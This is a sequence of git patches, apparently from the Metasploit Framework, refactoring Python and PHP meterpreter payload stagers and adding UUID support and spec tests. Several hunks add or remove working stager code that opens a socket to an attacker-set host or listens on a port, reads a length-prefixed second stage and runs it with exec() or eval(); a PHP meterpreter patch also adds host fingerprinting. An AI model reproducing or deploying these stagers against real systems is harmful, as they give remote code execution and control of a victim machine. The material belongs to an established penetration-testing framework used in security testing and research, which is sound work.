       "bgrun"      => "Executes a meterpreter script as a background thread",
@@ -80,8 +81,6 @@ class Console::CommandDispatcher::Core
       # Migration only supported on windows and linux
       c["migrate"] = "Migrate the server to another process"
 
-      # UUID functionality isn't yet available on other platforms
-      c["uuid"] = "Get the UUID for the current session"
 
       # Yet to implement transport hopping for other meterpreters.
       # Works for posix and native windows though.
diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb
index 75612fa414..a51bd39ede 100644
--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -5,6 +5,8 @@
 
 require 'msf/core'
 require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/python'
+require 'msf/core/payload/python/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
@@ -13,45 +15,20 @@ module Metasploit3
   CachedSize = 374
 
   include Msf::Payload::Stager
+  include Msf::Payload::Python
+  include Msf::Payload::Python::BindTcp
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Python Bind TCP Stager',
-      'Description'   => 'Listen for a connection',
-      'Author'        => 'Spencer McIntyre',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'python',
-      'Arch'          => ARCH_PYTHON,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Stager'        => {'Payload' => ""}
+      'Name'        => 'Python Bind TCP Stager',
+      'Description' => 'Listen for a connection',
+      'Author'      => 'Spencer McIntyre',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'python',
+      'Arch'        => ARCH_PYTHON,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Stager'      => {'Payload' => ""}
     ))
   end
 
-  #
-  # Constructs the payload
-  #
-  def generate
-    # Set up the socket
-    cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd << "s.listen(1)\n"
-    cmd << "c,a=s.accept()\n"
-    cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
-    cmd << "d=c.recv(l)\n"
-    cmd << "while len(d)<l:\n"
-    cmd << "\td+=c.recv(l-len(d))\n"
-    cmd << "exec(d,{'s':c})\n"
-
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    b64_stub  = "import base64,sys;exec(base64.b64decode("
-    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
-    b64_stub << Rex::Text.encode_base64(cmd)
-    b64_stub << "')))"
-    return b64_stub
-  end
-
-  def handle_intermediate_stage(conn, payload)
-    conn.put([payload.length].pack("N"))
-  end
 end
diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb
new file mode 100644
index 0000000000..5141841e1e
--- /dev/null
+++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb
@@ -0,0 +1,43 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/core/payload/python'
+require 'msf/core/payload/python/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  CachedSize = 374
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Python
+  include Msf::Payload::Python::BindTcp
+
+  def self.handler_type_alias
+    'bind_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Python Bind TCP Stager with UUID support',
+      'Description' => 'Listen for a connection with UUID support',
+      'Author'      => 'OJ Reeves',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'python',
+      'Arch'        => ARCH_PYTHON,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Stager'      => {'Payload' => ""}
+    ))
+  end
+
+  # Tell the reverse_tcp payload to include the UUID
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb
index 9f646f5c6f..08d5011f09 100644
--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -5,51 +5,29 @@
 
 require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/python/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = 342
 
   include Msf::Payload::Stager
+  include Msf::Payload::Python
+  include Msf::Payload::Python::ReverseTcp
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Python Reverse TCP Stager',
-      'Description'   => 'Connect back to the attacker',
-      'Author'        => 'Spencer McIntyre',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'python',
-      'Arch'          => ARCH_PYTHON,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Stager'        => {'Payload' => ""}
+      'Name'        => 'Python Reverse TCP Stager',
+      'Description' => 'Connect back to the attacker',
+      'Author'      => 'Spencer McIntyre',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'python',
+      'Arch'        => ARCH_PYTHON,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => {'Payload' => ""}
     ))
   end
 
-  #
-  # Constructs the payload
-  #
-  def generate
-    # Set up the socket
-    cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-    cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
-    cmd << "d=s.recv(l)\n"
-    cmd << "while len(d)<l:\n"
-    cmd << "\td+=s.recv(l-len(d))\n"
-    cmd << "exec(d,{'s':s})\n"
-
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    b64_stub  = "import base64,sys;exec(base64.b64decode("
-    b64_stub << "{2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('"
-    b64_stub << Rex::Text.encode_base64(cmd)
-    b64_stub << "')))"
-    return b64_stub
-  end
-
-  def handle_intermediate_stage(conn, payload)
-    conn.put([payload.length].pack("N"))
-  end
 end
diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
new file mode 100644
index 0000000000..85d6490fa2
--- /dev/null
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/core/payload/python/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit4
+
+  CachedSize = 342
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Python
+  include Msf::Payload::Python::ReverseTcp
+
+  def self.handler_type_alias
+    'reverse_tcp_uuid'
+  end
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Python Reverse TCP Stager with UUID support',
+      'Description' => 'Connect back to the attacker with UUID support',
+      'Author'      => 'OJ Reeves',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'python',
+      'Arch'        => ARCH_PYTHON,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Stager'      => {'Payload' => ""}
+    ))
+  end
+
+  # Tell the reverse_tcp payload to include the UUID
+  def include_send_uuid
+    true
+  end
+
+end
diff --git a/modules/payloads/stages/php/meterpreter.rb b/modules/payloads/stages/php/meterpreter.rb
index a057c695d8..08c4a8daf7 100644
--- a/modules/payloads/stages/php/meterpreter.rb
+++ b/modules/payloads/stages/php/meterpreter.rb
@@ -37,7 +37,7 @@ module Metasploit3
       )
     end
 
-    bytes = uuid.to_raw.map { |c| '\x%.2x' % c }.join('')
+    bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("\"PAYLOAD_UUID\", \"\"", "\"PAYLOAD_UUID\", \"#{bytes}\"")
 
     #met.gsub!(/#.*?$/, '')
diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb
index 21bf8cf9ea..c00b559c35 100644
--- a/modules/payloads/stages/python/meterpreter.rb
+++ b/modules/payloads/stages/python/meterpreter.rb
@@ -37,14 +37,12 @@ module Metasploit3
       met = met.sub("DEBUGGING = False", "DEBUGGING = True")
     end
 
-    unless opts[:uuid]
-      uuid = Msf::Payload::UUID.new(
-        platform: 'python',
-        arch:     ARCH_PYTHON
-      )
-    end
+    uuid = opts[:uuid] || Msf::Payload::UUID.new(
+      platform: 'python',
+      arch:     ARCH_PYTHON
+    )
 
-    bytes = uuid.to_raw.map { |c| '\x%.2x' % c }.join('')
+    bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
     met = met.sub("PAYLOAD_UUID = \"\"", "PAYLOAD_UUID = \"#{bytes}\"")
 
     met

From e41ae9352487cd222d8043c7315e7a913468fd9a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 14:58:10 +1000
Subject: [PATCH 0104/1013] Payload sizes, specs and more

---
 .../singles/php/meterpreter_reverse_tcp.rb    |  2 +-
 .../stagers/linux/x86/bind_tcp_uuid.rb        |  2 +-
 .../stagers/linux/x86/reverse_tcp_uuid.rb     |  2 +-
 modules/payloads/stagers/python/bind_tcp.rb   |  2 +-
 .../payloads/stagers/python/bind_tcp_uuid.rb  |  4 +-
 .../stagers/python/reverse_tcp_uuid.rb        |  2 +-
 spec/modules/payloads_spec.rb                 | 88 +++++++++++++++++++
 7 files changed, 95 insertions(+), 7 deletions(-)

diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index fc5257cc1b..cfe7556574 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_options'
 
 module Metasploit3
 
-  CachedSize = 24643
+  CachedSize = 24947
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
index 92d7b005ea..9bae106ea4 100644
--- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/linux/bind_tcp'
 
 module Metasploit4
 
-  CachedSize = 110
+  CachedSize = 146
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::BindTcp
diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
index 5c3657ec11..60eeecb7ab 100644
--- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 193
+  CachedSize = 229
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp
diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb
index a51bd39ede..aaab854577 100644
--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
   CachedSize = 374
 
diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb
index 5141841e1e..279b2d9d62 100644
--- a/modules/payloads/stagers/python/bind_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb
@@ -10,9 +10,9 @@ require 'msf/core/payload/python/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
-  CachedSize = 374
+  CachedSize = 474
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
index 85d6490fa2..472bfbe420 100644
--- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit4
 
-  CachedSize = 342
+  CachedSize = 442
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index ce84676c5e..bd5083c12d 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1353,6 +1353,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'linux/x86/meterpreter/bind_tcp'
   end
 
+  context 'linux/x86/meterpreter/bind_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/linux/x86/bind_tcp_uuid',
+                              'stages/linux/x86/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x86/meterpreter/bind_tcp_uuid'
+  end
+
   context 'linux/x86/meterpreter/find_tag' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -1397,6 +1408,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'linux/x86/meterpreter/reverse_tcp'
   end
 
+  context 'linux/x86/meterpreter/reverse_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/linux/x86/reverse_tcp_uuid',
+                              'stages/linux/x86/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/x86/meterpreter/reverse_tcp_uuid'
+  end
+
   context 'linux/x86/metsvc_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2084,6 +2106,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'python/meterpreter/bind_tcp'
   end
 
+  context 'python/meterpreter/bind_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/python/bind_tcp_uuid',
+                              'stages/python/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/bind_tcp_uuid'
+  end
+
   context 'python/meterpreter/reverse_http' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2117,6 +2150,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'python/meterpreter/reverse_tcp'
   end
 
+  context 'python/meterpreter/reverse_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/python/reverse_tcp_uuid',
+                              'stages/python/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'python/meterpreter/reverse_tcp_uuid'
+  end
+
   context 'python/shell_reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2587,6 +2631,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/meterpreter/bind_tcp_rc4'
   end
 
+  context 'windows/meterpreter/bind_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/bind_tcp_uuid',
+                              'stages/windows/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/meterpreter/bind_tcp_uuid'
+  end
+
   context 'windows/meterpreter/find_tag' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -2741,6 +2796,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/meterpreter/reverse_tcp_rc4_dns'
   end
 
+  context 'windows/meterpreter/reverse_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/reverse_tcp_uuid',
+                              'stages/windows/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/meterpreter/reverse_tcp_uuid'
+  end
+
   context 'windows/metsvc_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -3557,6 +3623,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/x64/meterpreter/bind_tcp'
   end
 
+  context 'windows/x64/meterpreter/bind_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/x64/bind_tcp_uuid',
+                              'stages/windows/x64/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter/bind_tcp_uuid'
+  end
+
   context 'windows/x64/meterpreter/reverse_http' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -3590,6 +3667,17 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/x64/meterpreter/reverse_tcp'
   end
 
+  context 'windows/x64/meterpreter/reverse_tcp_uuid' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'stagers/windows/x64/reverse_tcp_uuid',
+                              'stages/windows/x64/meterpreter'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/meterpreter/reverse_tcp_uuid'
+  end
+
   context 'windows/x64/meterpreter/reverse_winhttp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From 9296a024e2ab978aa743c34d41dc2109c262dc66 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2015 17:40:48 +1000
Subject: [PATCH 0105/1013] PHP meterpreter refactoring in prep for uuid work

---
 data/meterpreter/meterpreter.php              |  35 ++++-
 data/meterpreter/meterpreter.py               |  16 ++-
 lib/msf/core/payload/php/bind_tcp.rb          | 123 ++++++++++++++++++
 lib/msf/core/payload/php/reverse_tcp.rb       | 111 ++++++++++++++++
 lib/msf/core/payload/php/send_uuid.rb         |  43 ++++++
 lib/msf/core/payload/python/bind_tcp.rb       |   5 +-
 .../singles/php/meterpreter_reverse_tcp.rb    |  15 ++-
 modules/payloads/stagers/php/bind_tcp.rb      |  21 +--
 modules/payloads/stagers/php/bind_tcp_ipv6.rb |  43 ++----
 modules/payloads/stagers/php/reverse_tcp.rb   |  49 ++-----
 modules/payloads/stagers/python/bind_tcp.rb   |   2 +-
 .../payloads/stagers/python/bind_tcp_uuid.rb  |   2 +-
 .../payloads/stagers/python/reverse_tcp.rb    |   1 -
 modules/payloads/stages/php/meterpreter.rb    |  19 ++-
 14 files changed, 375 insertions(+), 110 deletions(-)
 create mode 100644 lib/msf/core/payload/php/bind_tcp.rb
 create mode 100644 lib/msf/core/payload/php/reverse_tcp.rb
 create mode 100644 lib/msf/core/payload/php/send_uuid.rb

diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
index ab71743636..4d76383caf 100755
--- a/data/meterpreter/meterpreter.php
+++ b/data/meterpreter/meterpreter.php
@@ -1,4 +1,4 @@
-#<?php
+//<?php
 
 # Everything that needs to be global has to be made so explicitly so we can run
 # inside a call to create_user_func($user_input);
@@ -32,7 +32,7 @@ if (!isset($GLOBALS['readers'])) {
 
 # global list of extension commands
 if (!isset($GLOBALS['commands'])) {
-    $GLOBALS['commands'] = array("core_loadlib", "core_uuid");
+    $GLOBALS['commands'] = array("core_loadlib", "core_machine_id", "core_uuid");
 }
 
 function register_command($c) {
@@ -432,6 +432,37 @@ function core_uuid($req, &$pkt) {
 }
 
 
+function get_hdd_label() {
+  foreach (scandir('/dev/disk/by-id/') as $file) {
+    foreach (array("ata-", "mb-") as $prefix) {
+      if (strpos($file, $prefix) === 0) {
+        return substr($file, strlen($prefix));
+      }
+    }
+  }
+  return "";
+}
+
+function core_machine_id($req, &$pkt) {
+  my_print("doing core_machine_id");
+  $machine_id = gethostname();
+  $serial = "";
+
+  if (is_windows()) {
+    # TODO: need help from real PHP folks who know how to do
+    # things via the Windows API. We need to:
+    # 1) get the system volume
+    # 2) get the volume information for that volume.
+    # 3) get the serial number from the extracted volume info.
+    # 4) create a serial in the format:
+    # "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
+  } else {
+    $serial = get_hdd_label();
+  }
+
+  packet_add_tlv($pkt, create_tlv(TLV_TYPE_MACHINE_ID, $serial.":".$machine_id));
+  return ERROR_SUCCESS;
+}
 
 
 ##
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index e1736f67c6..a39fde22ae 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -577,6 +577,14 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_machine_id(self, request, response):
+		def get_hdd_label():
+			for _, _, files in os.walk('/dev/disk/by-id/'):
+				for f in files:
+					for p in ['ata-', 'mb-']:
+						if f[:len(p)] == p:
+							return f[len(p):]
+			return ""
+
 		serial = ''
 		machine_name = platform.uname()[1]
 		if has_windll:
@@ -598,12 +606,8 @@ class PythonMeterpreter(object):
 			serial_num = serial_num.value
 			serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
 		else:
-			for _, _, files in os.walk('/dev/disk/by-id/'):
-				for f in files:
-					for p in ['ata-', 'mb-']:
-						if f[:len(p)] == p:
-							serial = f[len(p):]
-							break
+			serial = get_hdd_label()
+
 		response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
 		return ERROR_SUCCESS, response
 
diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb
new file mode 100644
index 0000000000..0ef0ee4da9
--- /dev/null
+++ b/lib/msf/core/payload/php/bind_tcp.rb
@@ -0,0 +1,123 @@
+
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/php/send_uuid'
+
+module Msf
+
+###
+#
+# Complex bind_tcp payload generation for PHP
+#
+###
+
+module Payload::Php::BindTcp
+
+  include Msf::Payload::Php
+  include Msf::Payload::Php::SendUUID
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port: datastore['LPORT']
+    }
+
+    php = super + generate_bind_tcp(conf)
+    php.gsub!(/#.*$/, '')
+    Rex::Text.compress(php)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def use_ipv6
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_bind_tcp(opts)
+  end
+
+  def generate_bind_tcp(opts={})
+    ipf = 'AF_INET'
+    ip = '0.0.0.0'
+    if use_ipv6
+      ipf << "6"
+      ip = '[::]'
+    end
+
+    php = %Q^//<?php
+error_reporting(0);
+$ip = '#{ip}';
+$port = #{opts[:port]};
+
+if (is_callable('stream_socket_server')) {
+	$srvsock = stream_socket_server("tcp://{$ip}:{$port}");
+	if (!$srvsock) { die(); }
+	$s = stream_socket_accept($srvsock, -1);
+	fclose($srvsock);
+	$s_type = 'stream';
+} elseif (is_callable('socket_create_listen')) {
+	$srvsock = socket_create_listen(#{ipf}, SOCK_STREAM, SOL_TCP);
+	if (!$res) { die(); }
+	$s = socket_accept($srvsock);
+	socket_close($srvsock);
+	$s_type = 'socket';
+} elseif (is_callable('socket_create')) {
+	$srvsock = socket_create(#{ipf}, SOCK_STREAM, SOL_TCP);
+	$res = socket_bind($srvsock, $ip, $port);
+	if (!$res) { die(); }
+	$s = socket_accept($srvsock);
+	socket_close($srvsock);
+	$s_type = 'socket';
+} else {
+	die();
+}
+if (!$s) { die(); }
+^
+
+    php << php_send_uuid if include_send_uuid
+
+    php << %Q^switch ($s_type) { 
+case 'stream': $len = fread($s, 4); break;
+case 'socket': $len = socket_read($s, 4); break;
+}
+if (!$len) {
+	# We failed on the main socket.  There's no way to continue, so
+	# bail
+	die();
+}
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+
+$b = '';
+while (strlen($b) < $len) {
+	switch ($s_type) {
+	case 'stream': $b .= fread($s, $len-strlen($b)); break;
+	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
+	}
+}
+
+# Set up the socket for the main stage to use.
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+eval($b);
+die();^
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
new file mode 100644
index 0000000000..77baa0688c
--- /dev/null
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -0,0 +1,111 @@
+
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/php/send_uuid'
+
+module Msf
+
+###
+#
+# Complex reverse_tcp payload generation for PHP
+#
+###
+
+module Payload::Php::ReverseTcp
+
+  include Msf::Payload::Php::SendUUID
+
+  #
+  # Generate the first stage
+  #
+  def generate
+    conf = {
+      port:        datastore['LPORT'],
+      host:        datastore['LHOST'],
+      retry_count: datastore['ReverseConnectRetries'],
+    }
+
+    php = super + generate_reverse_tcp(conf)
+    php.gsub!(/#.*$/, '')
+    Rex::Text.compress(php)
+  end
+
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
+  def transport_config(opts={})
+    transport_config_reverse_tcp(opts)
+  end
+
+  def generate_reverse_tcp(opts={})
+    ipf = "AF_INET";
+    if Rex::Socket.is_ipv6?(opts[:host])
+      ipf << "6"
+      opts[:host] = "[#{opts[:host]}]"
+    end
+
+    php = %Q^//<?php
+error_reporting(0);
+$ip = '#{opts[:host]}';
+$port = #{opts[:port]};
+
+if (($f = 'stream_socket_client') && is_callable($f)) {
+	$s = $f("tcp://{$ip}:{$port}");
+	$s_type = 'stream';
+} elseif (($f = 'fsockopen') && is_callable($f)) {
+	$s = $f($ip, $port);
+	$s_type = 'stream';
+} elseif (($f = 'socket_create') && is_callable($f)) {
+	$s = $f(#{ipf}, SOCK_STREAM, SOL_TCP);
+	$res = @socket_connect($s, $ip, $port);
+	if (!$res) { die(); }
+	$s_type = 'socket';
+} else {
+	die('no socket funcs');
+}
+if (!$s) { die('no socket'); }
+^
+
+    php << php_send_uuid if include_send_uuid
+
+    php << %Q^switch ($s_type) { 
+case 'stream': $len = fread($s, 4); break;
+case 'socket': $len = socket_read($s, 4); break;
+}
+if (!$len) {
+	# We failed on the main socket.  There's no way to continue, so
+	# bail
+	die();
+}
+$a = unpack("Nlen", $len);
+$len = $a['len'];
+
+$b = '';
+while (strlen($b) < $len) {
+	switch ($s_type) { 
+	case 'stream': $b .= fread($s, $len-strlen($b)); break;
+	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
+	}
+}
+
+# Set up the socket for the main stage to use.
+$GLOBALS['msgsock'] = $s;
+$GLOBALS['msgsock_type'] = $s_type;
+eval($b);
+die();^
+  end
+
+  def handle_intermediate_stage(conn, payload)
+    conn.put([payload.length].pack("N"))
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/php/send_uuid.rb b/lib/msf/core/payload/php/send_uuid.rb
new file mode 100644
index 0000000000..c4ffae412e
--- /dev/null
+++ b/lib/msf/core/payload/php/send_uuid.rb
@@ -0,0 +1,43 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/php'
+require 'msf/core/payload/uuid'
+
+module Msf
+
+###
+#
+# Basic send_uuid stub for PHP payloads
+#
+###
+
+module Payload::Php::SendUUID
+
+  #
+  # Generate PHP code that writes the UUID to the socket.
+  #
+  def php_send_uuid(opts={})
+    sock_var = opts[:sock_var] || '$s'
+    sock_type = opts[:sock_type] || '$s_type'
+
+    uuid = opts[:uuid] || Msf::Payload::UUID.new(
+      platform: 'php',
+      arch:     ARCH_PHP
+    )
+
+    uuid_raw = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')
+
+    php = %Q^$u="#{uuid_raw}";
+switch (#{sock_type}) { 
+case 'stream': fwrite(#{sock_var}, $u); break;
+case 'socket': socket_write(#{sock_var}, $u); break;
+}
+^
+    php
+  end
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/python/bind_tcp.rb b/lib/msf/core/payload/python/bind_tcp.rb
index ca9733aa20..ff63f914b4 100644
--- a/lib/msf/core/payload/python/bind_tcp.rb
+++ b/lib/msf/core/payload/python/bind_tcp.rb
@@ -20,8 +20,7 @@ module Payload::Python::BindTcp
   #
   def generate
     conf = {
-      port: datastore['LPORT'],
-      host: datastore['LHOST']
+      port: datastore['LPORT']
     }
 
     generate_bind_tcp(conf)
@@ -43,7 +42,7 @@ module Payload::Python::BindTcp
     # Set up the socket
     cmd  = "import socket,struct\n"
     cmd << "b=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
